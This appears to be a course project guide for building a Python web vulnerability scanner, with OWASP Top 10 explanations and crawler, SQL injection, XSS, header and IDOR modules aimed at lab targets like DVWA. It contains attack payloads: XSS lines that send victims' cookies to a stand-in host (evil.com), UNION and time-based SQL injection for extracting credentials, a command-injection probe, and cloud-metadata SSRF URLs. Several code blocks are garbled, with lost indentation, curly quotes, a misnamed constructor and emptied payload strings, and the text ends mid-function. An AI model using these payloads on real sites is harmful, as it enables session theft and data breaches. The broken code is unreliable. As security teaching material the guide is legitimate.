Project 2: Web Application Vulnerability Scanner

Goal: Develop hands-on offensive security skills by building tools and lab environments that demonstrate real attack paths with safe, reproducible evidence.

Offensive Workflow and Safety

Every offensive task has a legal boundary and a safety boundary. Define scope, isolate labs, and collect evidence without causing damage.

Reconnaissance to Exploitation

Recon discovers surface area, scanning validates exposure, and exploitation demonstrates impact. Each phase should output artifacts that make the next phase precise and repeatable.

Post-Exploitation and Reporting

Access without evidence is not a result. The goal is reproducible findings, minimal persistence, and clear remediation steps.

Concept Summary Table

Concept Cluster What You Need to Internalize
Recon Asset discovery and fingerprinting.
Exploitation Controlled proof of impact.
Post-exploitation Privilege escalation and evidence capture.
OpSec Avoid collateral damage, use lab setups.
Reporting Clear, actionable remediation output.

Deep Dive Reading by Concept

Concept Book & Chapter
Recon & scanning The Hacker Playbook 3 — recon chapters
Web exploitation Web Application Hacker’s Handbook — SQLi/XSS
Post-exploitation Penetration Testing by Weidman — post-ex chapters
Reporting PTES Technical Guidelines — reporting

Project Overview

Attribute Value
Difficulty Intermediate
Time Estimate 2-3 weeks
Programming Language Python
Primary Framework OWASP Top 10
Main Book “Bug Bounty Bootcamp” by Vickie Li
Knowledge Area Web Security

Learning Objectives

By completing this project, you will:

  1. Master the OWASP Top 10 - Understand each vulnerability class deeply enough to detect and exploit them
  2. Understand HTTP at the protocol level - Request/response headers, cookies, sessions, and state management
  3. Build automated security testing - Design scanners that find real vulnerabilities
  4. Learn attack surface discovery - Crawl applications to identify all input points
  5. Develop responsible disclosure skills - Report findings professionally with evidence

The Core Question

“How do web application scanners automatically find vulnerabilities that developers miss?”

Web applications are the #1 attack surface in modern organizations. Building your own scanner teaches you:

  • Why certain coding patterns create vulnerabilities
  • How injection attacks actually work at the request/response level
  • What makes false positives vs true positives
  • The difference between automated scanning and skilled testing

Deep Theoretical Foundation

The HTTP Protocol: Your Attack Surface

Every web vulnerability exploitation involves HTTP requests and responses. You must understand this protocol intimately:

HTTP REQUEST ANATOMY
════════════════════

POST /login HTTP/1.1                           ◄── Request Line
Host: vulnerable-app.com                       ◄── Headers begin
User-Agent: Mozilla/5.0 (Windows NT 10.0)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Cookie: session=abc123; tracking=xyz789       ◄── Cookies (session state)
Connection: close
                                               ◄── Blank line separates headers/body
username=admin&password=secret123              ◄── Request Body (POST data)


HTTP RESPONSE ANATOMY
═════════════════════

HTTP/1.1 200 OK                                ◄── Status Line
Date: Mon, 27 Dec 2025 12:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)                 ◄── Information disclosure!
X-Powered-By: PHP/7.4.3                        ◄── More info disclosure!
Set-Cookie: session=def456; HttpOnly; Secure   ◄── New session cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
                                               ◄── Blank line
<!DOCTYPE html>                                ◄── Response Body
<html>
<head><title>Welcome Admin</title></head>      ◄── May reveal successful login
<body>...

Where Vulnerabilities Live

Web applications have multiple layers, each with unique attack surfaces:

┌─────────────────────────────────────────────────────────────────────┐
│                    WEB APPLICATION STACK                             │
│                  (Attack Surface at Every Layer)                     │
└─────────────────────────────────────────────────────────────────────┘

CLIENT SIDE (Browser)
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐    │
│  │   JavaScript    │  │  Local Storage  │  │    Cookies      │    │
│  │                 │  │                 │  │                 │    │
│  │ ● XSS attacks   │  │ ● Sensitive     │  │ ● Session       │    │
│  │   execute here  │  │   data exposure │  │   hijacking     │    │
│  │ ● DOM           │  │ ● No HttpOnly   │  │ ● CSRF tokens   │    │
│  │   manipulation  │  │   protection    │  │ ● Missing       │    │
│  │                 │  │                 │  │   Secure flag   │    │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘    │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              │  HTTP Request
                              ▼
┌─────────────────────────────────────────────────────────────────────┐
│  WEB SERVER (nginx, Apache, IIS)                                    │
│                                                                     │
│  ● Security headers (CSP, X-Frame-Options)                          │
│  ● TLS configuration (HTTPS)                                        │
│  ● Directory listings                                               │
│  ● Server version disclosure                                        │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────────┐
│  APPLICATION LAYER (PHP, Python, Node.js, Java)                     │
│                                                                     │
│  ┌─────────────────────────────────────────────────────────────┐   │
│  │                    INPUT HANDLING                             │   │
│  │                                                               │   │
│  │  URL Parameters:  /page?id=1        ← SQL Injection           │   │
│  │  POST Data:       username=admin    ← Auth Bypass             │   │
│  │  Headers:         User-Agent: ...   ← Log Injection           │   │
│  │  Cookies:         role=user         ← Privilege Escalation    │   │
│  │  File Uploads:    image.php.jpg     ← Remote Code Execution   │   │
│  │  JSON/XML:        {"user":"..."}    ← XXE, Deserialization    │   │
│  └─────────────────────────────────────────────────────────────┘   │
│                                                                     │
│  ┌─────────────────────────────────────────────────────────────┐   │
│  │                    BUSINESS LOGIC                             │   │
│  │                                                               │   │
│  │  ● IDOR (Insecure Direct Object Reference)                   │   │
│  │    GET /api/users/123 → Change to /api/users/124             │   │
│  │                                                               │   │
│  │  ● Authorization flaws                                        │   │
│  │    User can access admin functions                           │   │
│  │                                                               │   │
│  │  ● Race conditions                                            │   │
│  │    Submit payment twice quickly                              │   │
│  └─────────────────────────────────────────────────────────────┘   │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────────┐
│  DATABASE LAYER                                                     │
│                                                                     │
│  ● SQL Injection (SELECT * FROM users WHERE id='$input')           │
│  ● NoSQL Injection (MongoDB query operators)                        │
│  ● Stored XSS (malicious data in database)                         │
│  ● Credential exposure (passwords in plaintext)                     │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Web Application Stack - Attack Surface at Every Layer

OWASP Top 10 2025: What Your Scanner Must Find

┌────────────────────────────────────────────────────────────────────┐
│              OWASP TOP 10 2025 VULNERABILITY CLASSES               │
└────────────────────────────────────────────────────────────────────┘

[A01] BROKEN ACCESS CONTROL
─────────────────────────────
What: Users can access resources they shouldn't
How to test:
  1. Change ?user_id=123 to ?user_id=124
  2. Access /admin without admin role
  3. Modify hidden form fields (role=admin)
  4. Bypass authentication via direct URL

Scanner Detection:
  ├── Test IDOR by incrementing/decrementing IDs
  ├── Access restricted paths without authentication
  └── Modify request parameters and observe response changes


[A02] CRYPTOGRAPHIC FAILURES
────────────────────────────
What: Sensitive data exposed due to weak/missing encryption
How to test:
  1. Check for HTTP (not HTTPS)
  2. Analyze password storage (MD5, plaintext visible)
  3. Look for sensitive data in responses

Scanner Detection:
  ├── Flag any non-HTTPS login pages
  ├── Check for password/credit card in response bodies
  └── Analyze Set-Cookie for missing Secure flag


[A03] INJECTION (SQL, Command, LDAP)
────────────────────────────────────
What: Untrusted data sent to interpreter as part of command
How to test:
  1. Add ' to inputs, look for SQL errors
  2. Try SQL payloads: ' OR '1'='1
  3. Test for command injection: ; ls -la
  4. LDAP injection: )(uid=*)

Scanner Detection:
  ├── Inject ' and " in all parameters
  ├── Analyze error messages for SQL syntax errors
  ├── Use time-based payloads: ' AND SLEEP(5)--
  └── Look for command output in responses


[A04] INSECURE DESIGN
─────────────────────
What: Missing security controls, flawed architecture
How to test:
  1. Check for rate limiting (brute force possible?)
  2. Review password reset flow
  3. Look for missing CAPTCHA

Scanner Detection:
  ├── Send 100 requests rapidly, check for rate limiting
  ├── Test password reset token predictability
  └── Note: Many design flaws need manual review


[A05] SECURITY MISCONFIGURATION
───────────────────────────────
What: Insecure default configs, unnecessary features
How to test:
  1. Check for default credentials
  2. Look for exposed admin interfaces
  3. Directory listing enabled?
  4. Stack traces in errors?

Scanner Detection:
  ├── Access /admin, /phpmyadmin, /wp-admin
  ├── Trigger errors, check for verbose messages
  ├── Test for directory listing: /images/
  └── Check common default credentials


[A06] VULNERABLE COMPONENTS
───────────────────────────
What: Using libraries with known CVEs
How to test:
  1. Identify framework/library versions
  2. Check against CVE databases
  3. Look for outdated JavaScript libraries

Scanner Detection:
  ├── Parse Server header for versions
  ├── Check JavaScript libraries against retire.js
  └── Identify framework from response patterns


[A07] AUTHENTICATION FAILURES
─────────────────────────────
What: Broken login, session management
How to test:
  1. Brute force with common passwords
  2. Session fixation attacks
  3. Session timeout (do sessions expire?)

Scanner Detection:
  ├── Try admin:admin, admin:password
  ├── Check if session ID changes after login
  ├── Look for session ID in URL (bad practice)
  └── Test remember-me token security


[A08] DATA INTEGRITY FAILURES
─────────────────────────────
What: Software updates without verification
How to test:
  1. Check for unsigned updates
  2. Look for insecure deserialization

Scanner Detection:
  ├── Limited automated testing
  └── Flag if application loads external resources


[A09] LOGGING/MONITORING FAILURES
─────────────────────────────────
What: Attacks go undetected
How to test:
  1. Trigger suspicious activity
  2. Check if you're blocked after failed logins

Scanner Detection:
  ├── Multiple failed logins - are you blocked?
  └── Note: Primarily manual review


[A10] SSRF (Server-Side Request Forgery)
────────────────────────────────────────
What: Server makes requests to attacker-controlled destinations
How to test:
  1. Find URL input parameters
  2. Try ?url=http://169.254.169.254 (AWS metadata)
  3. Try ?url=http://localhost:8080

Scanner Detection:
  ├── Inject URLs pointing to known callback server
  ├── Try cloud metadata URLs
  └── Test for internal port scanning via SSRF

SQL Injection Deep Dive

SQL injection remains prevalent because it’s easy to make and hard to detect automatically:

NORMAL LOGIN QUERY
══════════════════

User Input:
  username: alice
  password: secret123

Application Code (VULNERABLE):
  query = "SELECT * FROM users WHERE username='" + username +
          "' AND password='" + password + "'"

Resulting Query:
  SELECT * FROM users WHERE username='alice' AND password='secret123'

Result: Only returns Alice's record if password matches


SQL INJECTION ATTACK
════════════════════

User Input:
  username: admin' --
  password: anything

Resulting Query:
  SELECT * FROM users WHERE username='admin' --' AND password='anything'
                                             ↑
                                    This is a SQL comment!
                                    Everything after is ignored

Actual Query Executed:
  SELECT * FROM users WHERE username='admin'

Result: Returns admin account WITHOUT password check!


UNION-BASED DATA EXTRACTION
═══════════════════════════

URL: /products?id=5

Normal Query:
  SELECT name, price, description FROM products WHERE id=5

Attack URL: /products?id=5 UNION SELECT username,password,email FROM users--

Resulting Query:
  SELECT name, price, description FROM products WHERE id=5
  UNION
  SELECT username, password, email FROM users--

Result: Page displays ALL usernames, passwords, and emails!


TIME-BASED BLIND SQL INJECTION
══════════════════════════════

When no visible output exists, measure response time:

Attack: /products?id=5' AND SLEEP(5)--

If the page takes 5+ seconds to load:
  → SQL injection confirmed!
  → Database is processing the SLEEP() command

Extracting data character by character:
  /products?id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

  If response takes 5 seconds → First char of database name is 'a'
  If response is instant → First char is NOT 'a', try 'b', 'c', etc.

Cross-Site Scripting (XSS) Explained

XSS ATTACK TYPES
════════════════

REFLECTED XSS (Non-Persistent)
──────────────────────────────
Attack URL sent to victim via phishing:
  https://vulnerable.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

Server reflects input in response:
  <h1>Search results for: <script>document.location='...'</script></h1>

Browser executes the script → Cookies stolen!


STORED XSS (Persistent)
───────────────────────
Attacker posts comment:
  Great product! <script>document.location='https://evil.com/steal?c='+document.cookie</script>

Comment saved in database, displayed to ALL users who view page
Every visitor's cookies are stolen automatically


DOM-BASED XSS
─────────────
Vulnerable JavaScript:
  document.getElementById('output').innerHTML = location.hash.substring(1);

Attack URL:
  https://vulnerable.com/page#<img src=x onerror=alert(document.cookie)>

Script never goes to server - executes entirely client-side


XSS PAYLOADS FOR TESTING
═══════════════════════════

Basic:
  <script>alert('XSS')</script>

Event handlers:
  <img src=x onerror=alert('XSS')>
  <body onload=alert('XSS')>
  <svg onload=alert('XSS')>

Filter bypasses:
  <ScRiPt>alert('XSS')</ScRiPt>                    # Case variation
  <script>alert(String.fromCharCode(88,83,83))</script>  # Char codes
  <img src=x onerror="&#97;lert('XSS')">           # HTML entities
  <script>eval(atob('YWxlcnQoJ1hTUycp'))</script>  # Base64

Context-aware:
  In attribute: " onmouseover="alert('XSS')
  In JavaScript: ';alert('XSS');//
  In URL: javascript:alert('XSS')

Project Specification

What You’re Building

A modular web vulnerability scanner with the following structure:

web-vuln-scanner/
├── scanner.py              # Main scanner orchestrator
├── crawler.py              # Web crawler for attack surface discovery
├── modules/
│   ├── __init__.py
│   ├── sqli.py            # SQL injection tests
│   ├── xss.py             # XSS tests
│   ├── idor.py            # IDOR/access control tests
│   ├── ssrf.py            # SSRF tests
│   ├── headers.py         # Security headers analysis
│   └── disclosure.py      # Information disclosure tests
├── payloads/
│   ├── sqli.txt           # SQL injection payloads
│   ├── xss.txt            # XSS payloads
│   └── wordlists/         # Directory brute-force lists
├── reports/
│   └── templates/
│       └── report.html    # HTML report template
├── requirements.txt
└── README.md

Functional Requirements

1. Web Crawler (crawler.py)

Must implement:

  • Start from seed URL, discover all pages
  • Extract forms (action URL, method, input fields)
  • Extract links (href, src)
  • Respect robots.txt (optional override)
  • Handle relative and absolute URLs
  • Track visited URLs to avoid loops

Should implement:

  • JavaScript rendering (Selenium/Playwright)
  • API endpoint discovery
  • Handle authentication (cookie jar)
  • Rate limiting

Output: List of pages with their forms and parameters

2. SQL Injection Scanner (modules/sqli.py)

Must implement:

  • Error-based detection (look for SQL errors in response)
  • Boolean-based detection (compare true/false responses)
  • Time-based detection (measure response delays)
  • Test all parameter types (GET, POST, cookies)

Should implement:

  • UNION-based exploitation
  • Identify database type (MySQL, PostgreSQL, MSSQL)
  • Extract table names
  • Payload encoding for WAF bypass

3. XSS Scanner (modules/xss.py)

Must implement:

  • Reflected XSS detection
  • Multiple context detection (HTML, attribute, JavaScript)
  • Basic filter bypass payloads

Should implement:

  • Stored XSS detection (check if payload persists)
  • DOM-based XSS detection
  • Custom payload generation based on context

4. IDOR Scanner (modules/idor.py)

Must implement:

  • Detect numeric ID parameters
  • Test ID manipulation (increment/decrement)
  • Compare responses for different IDs

Should implement:

  • UUID/GUID manipulation
  • Test with different user sessions

5. Security Headers Analyzer (modules/headers.py)

Must check for:

  • Content-Security-Policy
  • X-Content-Type-Options
  • X-Frame-Options
  • Strict-Transport-Security
  • X-XSS-Protection
  • Server/X-Powered-By disclosure

6. Report Generator

Must implement:

  • JSON output for tool integration
  • HTML report with findings, evidence, recommendations
  • Severity ratings (Critical, High, Medium, Low)
  • Screenshots/evidence storage

Solution Architecture

Component Design

┌─────────────────────────────────────────────────────────────────────┐
│                     WEB VULNERABILITY SCANNER                        │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
                    ┌───────────────────┐
                    │   Orchestrator    │
                    │   (scanner.py)    │
                    ├───────────────────┤
                    │ - Load config     │
                    │ - Initialize      │
                    │ - Coordinate      │
                    │ - Generate report │
                    └─────────┬─────────┘
                              │
        ┌─────────────────────┼─────────────────────┐
        │                     │                     │
        ▼                     ▼                     ▼
┌───────────────┐    ┌───────────────┐    ┌───────────────┐
│   Crawler     │    │   Modules     │    │   Reporter    │
├───────────────┤    ├───────────────┤    ├───────────────┤
│ - Discover    │    │ - SQLi        │    │ - Format      │
│   pages       │───►│ - XSS         │───►│   findings    │
│ - Extract     │    │ - IDOR        │    │ - Generate    │
│   forms       │    │ - Headers     │    │   HTML/JSON   │
│ - Map attack  │    │ - SSRF        │    │ - Severity    │
│   surface     │    │               │    │   rating      │
└───────────────┘    └───────────────┘    └───────────────┘

Key Data Structures

@dataclass
class CrawlResult:
    url: str
    method: str  # GET, POST
    parameters: List[Parameter]
    forms: List[Form]
    response_code: int

@dataclass
class Parameter:
    name: str
    value: str
    location: str  # query, body, cookie, header
    param_type: str  # string, numeric, email, etc.

@dataclass
class Form:
    action: str
    method: str
    inputs: List[FormInput]

@dataclass
class FormInput:
    name: str
    input_type: str  # text, password, hidden, etc.
    value: Optional[str]

@dataclass
class Vulnerability:
    vuln_type: str  # sqli, xss, idor, etc.
    severity: str  # critical, high, medium, low
    url: str
    parameter: str
    payload: str
    evidence: str
    reproduction_steps: List[str]
    recommendation: str

Testing Flow

SCANNER WORKFLOW
════════════════

1. CRAWLING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  Start URL: https://target.com                              │
   │                                                             │
   │  → Visit page                                               │
   │  → Extract links: /login, /products, /about                 │
   │  → Extract forms: login form, search form                   │
   │  → Queue new URLs for crawling                              │
   │  → Repeat until all URLs visited                            │
   │                                                             │
   │  Result: Attack surface map                                 │
   │    - 50 unique pages                                        │
   │    - 12 forms                                               │
   │    - 85 parameters                                          │
   └─────────────────────────────────────────────────────────────┘

2. TESTING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  For each parameter in attack surface:                      │
   │                                                             │
   │  SQLi Module:                                               │
   │    - Inject ' and " → Check for SQL errors                 │
   │    - Try boolean payloads → Compare responses              │
   │    - Try time-based → Measure delays                       │
   │                                                             │
   │  XSS Module:                                                │
   │    - Inject <script>alert(1)</script>                      │
   │    - Check if payload appears in response                  │
   │    - Test multiple contexts                                 │
   │                                                             │
   │  IDOR Module:                                               │
   │    - If numeric ID found, try adjacent values              │
   │    - Compare response content                               │
   │                                                             │
   │  ...repeat for each module...                              │
   └─────────────────────────────────────────────────────────────┘

3. REPORTING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  Aggregate all findings:                                    │
   │    - Critical: 2 SQLi vulnerabilities                       │
   │    - High: 5 XSS vulnerabilities                           │
   │    - Medium: 3 IDOR issues                                  │
   │    - Low: 8 missing security headers                        │
   │                                                             │
   │  Generate report with:                                      │
   │    - Executive summary                                      │
   │    - Technical details for each finding                    │
   │    - Reproduction steps                                     │
   │    - Recommendations                                        │
   └─────────────────────────────────────────────────────────────┘

Web Vulnerability Scanner Workflow - Three Phase Process


Phased Implementation Guide

Phase 1: HTTP Client and Crawler Foundation (Days 1-3)

Goal: Crawl a simple website and extract all forms

Implementation steps:

  1. Create HTTP session wrapper: ```python import requests from urllib.parse import urljoin, urlparse

class WebSession: def init(self, base_url: str, timeout: int = 10): self.session = requests.Session() self.base_url = base_url self.timeout = timeout self.visited = set()

def get(self, url: str) -> requests.Response:
    full_url = urljoin(self.base_url, url)
    return self.session.get(full_url, timeout=self.timeout)

def post(self, url: str, data: dict) -> requests.Response:
    full_url = urljoin(self.base_url, url)
    return self.session.post(full_url, data=data, timeout=self.timeout) ```
  1. Implement HTML parser for links and forms: ```python from bs4 import BeautifulSoup

def extract_links(html: str, base_url: str) -> List[str]: soup = BeautifulSoup(html, ‘html.parser’) links = [] for a in soup.find_all(‘a’, href=True): link = urljoin(base_url, a[‘href’]) if urlparse(link).netloc == urlparse(base_url).netloc: links.append(link) return links

def extract_forms(html: str, base_url: str) -> List[Form]: soup = BeautifulSoup(html, ‘html.parser’) forms = [] for form in soup.find_all(‘form’): action = urljoin(base_url, form.get(‘action’, ‘’)) method = form.get(‘method’, ‘get’).upper() inputs = [] for inp in form.find_all([‘input’, ‘textarea’, ‘select’]): inputs.append(FormInput( name=inp.get(‘name’, ‘’), input_type=inp.get(‘type’, ‘text’), value=inp.get(‘value’, ‘’) )) forms.append(Form(action, method, inputs)) return forms


3. Implement BFS crawler:
```python
from collections import deque

def crawl(start_url: str, max_pages: int = 100) -> List[CrawlResult]:
    session = WebSession(start_url)
    queue = deque([start_url])
    results = []

    while queue and len(results) < max_pages:
        url = queue.popleft()
        if url in session.visited:
            continue
        session.visited.add(url)

        try:
            response = session.get(url)
            links = extract_links(response.text, url)
            forms = extract_forms(response.text, url)
            params = extract_url_params(url)

            results.append(CrawlResult(url, 'GET', params, forms, response.status_code))

            for link in links:
                if link not in session.visited:
                    queue.append(link)
        except Exception as e:
            print(f"Error crawling {url}: {e}")

    return results

Verification: Crawl DVWA or OWASP WebGoat and list all discovered forms

Phase 2: SQL Injection Module (Days 3-6)

Goal: Detect SQL injection in any parameter

Implementation steps:

  1. Create payload injection framework:
    def inject_parameter(session: WebSession, url: str, param: str, payload: str, method: str = 'GET') -> requests.Response:
     """Inject payload into specific parameter"""
     if method == 'GET':
         # Modify URL query string
         parsed = urlparse(url)
         params = dict(parse_qs(parsed.query))
         params[param] = [payload]
         new_query = urlencode(params, doseq=True)
         new_url = parsed._replace(query=new_query).geturl()
         return session.get(new_url)
     else:
         # Modify POST body
         return session.post(url, data={param: payload})
    
  2. Implement error-based detection: ```python SQL_ERRORS = [ “you have an error in your sql syntax”, “warning: mysql”, “unclosed quotation mark”, “quoted string not properly terminated”, “sqlexception”, “microsoft ole db provider for sql server”, “postgresql query failed”, “syntax error at or near”, ]

def test_sqli_error_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]: payloads = [”’”, ‘”’, “’ OR ‘1’=’1”, “1’ AND ‘1’=’1”]

for payload in payloads:
    response = inject_parameter(session, url, param, payload)
    for error in SQL_ERRORS:
        if error.lower() in response.text.lower():
            return Vulnerability(
                vuln_type="SQL Injection (Error-based)",
                severity="critical",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"SQL error found: {error}",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    f"3. Observe SQL error in response"
                ],
                recommendation="Use parameterized queries/prepared statements"
            )
return None ```
  1. Implement time-based detection: ```python import time

def test_sqli_time_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]: delay = 5 # seconds payloads = [ f”’ AND SLEEP({delay})–”, f”’; WAITFOR DELAY ‘0:0:{delay}’–”, f”’ AND pg_sleep({delay})–” ]

# First, get baseline response time
start = time.time()
session.get(url)
baseline = time.time() - start

for payload in payloads:
    start = time.time()
    inject_parameter(session, url, param, payload)
    elapsed = time.time() - start

    if elapsed >= baseline + delay - 0.5:  # Allow 0.5s tolerance
        return Vulnerability(
            vuln_type="SQL Injection (Time-based Blind)",
            severity="critical",
            url=url,
            parameter=param,
            payload=payload,
            evidence=f"Response delayed by {elapsed:.1f}s (expected {delay}s)",
            reproduction_steps=[...],
            recommendation="Use parameterized queries/prepared statements"
        )
return None ```

Verification: Detect SQLi in DVWA with security level “low”

Phase 3: XSS Module (Days 6-9)

Goal: Detect reflected XSS vulnerabilities

Implementation steps:

  1. Create XSS payload generator: ```python XSS_PAYLOADS = [ ‘’, ‘<img src=x onerror=alert(1)>’, ‘”>’, “‘-alert(1)-‘”, ‘<svg onload=alert(1)>’, ]

Random marker to detect reflection

def generate_xss_marker(): return f”xss{random.randint(10000, 99999)}”


2. Implement reflection detection:
```python
def test_xss_reflected(session: WebSession, url: str, param: str) -> List[Vulnerability]:
    vulnerabilities = []

    for payload in XSS_PAYLOADS:
        response = inject_parameter(session, url, param, payload)

        # Check if payload is reflected unencoded
        if payload in response.text:
            # Determine context
            context = determine_xss_context(response.text, payload)

            vulnerabilities.append(Vulnerability(
                vuln_type=f"Reflected XSS ({context})",
                severity="high",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Payload reflected in {context} context",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    f"3. Observe JavaScript execution"
                ],
                recommendation="Encode output based on context (HTML, JS, URL)"
            ))
            break  # Found XSS, no need to test more payloads

    return vulnerabilities

def determine_xss_context(html: str, payload: str) -> str:
    """Determine where payload landed in HTML"""
    soup = BeautifulSoup(html, 'html.parser')

    # Check if in script tag
    for script in soup.find_all('script'):
        if payload in script.text:
            return "JavaScript"

    # Check if in attribute
    for tag in soup.find_all():
        for attr, value in tag.attrs.items():
            if isinstance(value, str) and payload in value:
                return f"Attribute ({attr})"

    return "HTML body"
  1. Add filter bypass payloads:
    XSS_BYPASS_PAYLOADS = [
     # Case variation
     '<ScRiPt>alert(1)</ScRiPt>',
     # Event handlers
     '<img src=x onerror=alert(1)>',
     '<body onload=alert(1)>',
     # Unicode encoding
     '<script>alert\u0028\u0031\u0029</script>',
     # Double encoding
     '%253Cscript%253Ealert(1)%253C/script%253E',
    ]
    

Verification: Detect XSS in DVWA and OWASP WebGoat

Phase 4: Security Headers and Misconfig Detection (Days 9-11)

Goal: Check for missing security headers and misconfigurations

Implementation steps:

  1. Security headers analyzer: ```python SECURITY_HEADERS = { ‘Strict-Transport-Security’: { ‘severity’: ‘medium’, ‘recommendation’: ‘Add HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomains’ }, ‘Content-Security-Policy’: { ‘severity’: ‘medium’, ‘recommendation’: ‘Implement Content Security Policy to prevent XSS’ }, ‘X-Content-Type-Options’: { ‘severity’: ‘low’, ‘recommendation’: ‘Add X-Content-Type-Options: nosniff’ }, ‘X-Frame-Options’: { ‘severity’: ‘medium’, ‘recommendation’: ‘Add X-Frame-Options: DENY or SAMEORIGIN’ }, ‘X-XSS-Protection’: { ‘severity’: ‘low’, ‘recommendation’: ‘Add X-XSS-Protection: 1; mode=block’ } }

def check_security_headers(response: requests.Response) -> List[Vulnerability]: vulnerabilities = []

for header, info in SECURITY_HEADERS.items():
    if header not in response.headers:
        vulnerabilities.append(Vulnerability(
            vuln_type=f"Missing Security Header: {header}",
            severity=info['severity'],
            url=response.url,
            parameter="N/A",
            payload="N/A",
            evidence=f"Header {header} not present in response",
            reproduction_steps=[
                f"1. Request {response.url}",
                f"2. Inspect response headers",
                f"3. Note absence of {header}"
            ],
            recommendation=info['recommendation']
        ))

# Check for information disclosure
for header in ['Server', 'X-Powered-By', 'X-AspNet-Version']:
    if header in response.headers:
        vulnerabilities.append(Vulnerability(
            vuln_type=f"Information Disclosure: {header}",
            severity='low',
            url=response.url,
            parameter="N/A",
            payload="N/A",
            evidence=f"{header}: {response.headers[header]}",
            reproduction_steps=[...],
            recommendation=f"Remove or genericize {header} header"
        ))

return vulnerabilities ```
  1. Directory listing detection:
    def check_directory_listing(session: WebSession, base_url: str) -> List[Vulnerability]:
     common_dirs = ['/images/', '/uploads/', '/static/', '/assets/', '/css/', '/js/']
     vulnerabilities = []
    
     for directory in common_dirs:
         url = urljoin(base_url, directory)
         response = session.get(url)
    
         if response.status_code == 200:
             if 'Index of' in response.text or 'Directory listing' in response.text:
                 vulnerabilities.append(Vulnerability(
                     vuln_type="Directory Listing Enabled",
                     severity="low",
                     url=url,
                     parameter="N/A",
                     payload="N/A",
                     evidence="Directory contents visible",
                     reproduction_steps=[f"Navigate to {url}"],
                     recommendation="Disable directory listing in web server config"
                 ))
    
     return vulnerabilities
    

Phase 5: IDOR and Access Control (Days 11-13)

Goal: Detect insecure direct object references

Implementation steps:

  1. Identify numeric parameters:
    def find_numeric_params(crawl_results: List[CrawlResult]) -> List[tuple]:
     """Find all numeric ID parameters"""
     id_params = []
    
     for result in crawl_results:
         for param in result.parameters:
             # Check if value is numeric
             if param.value.isdigit():
                 id_params.append((result.url, param.name, param.value))
    
     return id_params
    
  2. Test for IDOR: ```python def test_idor(session: WebSession, url: str, param: str, original_id: str) -> Optional[Vulnerability]: “"”Test if changing ID returns different user’s data”””

    # Get original response original_response = session.get(url)

    # Try adjacent IDs test_ids = [ str(int(original_id) + 1), str(int(original_id) - 1), str(int(original_id) * 2), ]

    for test_id in test_ids: modified_url = url.replace(f”{param}={original_id}”, f”{param}={test_id}”) test_response = session.get(modified_url)

     # If we get a 200 with different content, potential IDOR
     if test_response.status_code == 200:
         if test_response.text != original_response.text:
             # Further analysis: does it contain PII-like data?
             if contains_pii_indicators(test_response.text):
                 return Vulnerability(
                     vuln_type="Insecure Direct Object Reference (IDOR)",
                     severity="high",
                     url=url,
                     parameter=param,
                     payload=f"Changed {original_id} to {test_id}",
                     evidence="Different data returned for modified ID",
                     reproduction_steps=[
                         f"1. Request original: {url}",
                         f"2. Modify {param} from {original_id} to {test_id}",
                         f"3. Observe different user data returned"
                     ],
                     recommendation="Implement proper authorization checks"
                 )  return None
    

def contains_pii_indicators(text: str) -> bool: “"”Check if response might contain personal data””” indicators = [‘email’, ‘phone’, ‘address’, ‘ssn’, ‘password’, ‘credit’, ‘account’] return any(ind in text.lower() for ind in indicators)


### Phase 6: Reporting and Integration (Days 13-14)

**Goal**: Generate professional vulnerability reports

**Implementation steps**:

1. Report generator:
```python
from jinja2 import Template

def generate_html_report(vulnerabilities: List[Vulnerability], target: str) -> str:
    template = Template('''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Vulnerability Scan Report - {{ target }}</title>
        <style>
            .critical { background-color: #ff4444; color: white; }
            .high { background-color: #ff8800; color: white; }
            .medium { background-color: #ffbb33; }
            .low { background-color: #99cc00; }
            .finding { border: 1px solid #ccc; margin: 10px; padding: 15px; }
        </style>
    </head>
    <body>
        <h1>Vulnerability Scan Report</h1>
        <h2>Target: {{ target }}</h2>
        <h2>Scan Date: {{ scan_date }}</h2>

        <h3>Summary</h3>
        <ul>
            <li class="critical">Critical: {{ critical_count }}</li>
            <li class="high">High: {{ high_count }}</li>
            <li class="medium">Medium: {{ medium_count }}</li>
            <li class="low">Low: {{ low_count }}</li>
        </ul>

        <h3>Findings</h3>
        {% for vuln in vulnerabilities %}
        <div class="finding {{ vuln.severity }}">
            <h4>{{ vuln.vuln_type }}</h4>
            <p><strong>URL:</strong> {{ vuln.url }}</p>
            <p><strong>Parameter:</strong> {{ vuln.parameter }}</p>
            <p><strong>Payload:</strong> <code>{{ vuln.payload }}</code></p>
            <p><strong>Evidence:</strong> {{ vuln.evidence }}</p>
            <p><strong>Recommendation:</strong> {{ vuln.recommendation }}</p>
        </div>
        {% endfor %}
    </body>
    </html>
    ''')

    return template.render(
        target=target,
        scan_date=datetime.now().isoformat(),
        vulnerabilities=vulnerabilities,
        critical_count=sum(1 for v in vulnerabilities if v.severity == 'critical'),
        high_count=sum(1 for v in vulnerabilities if v.severity == 'high'),
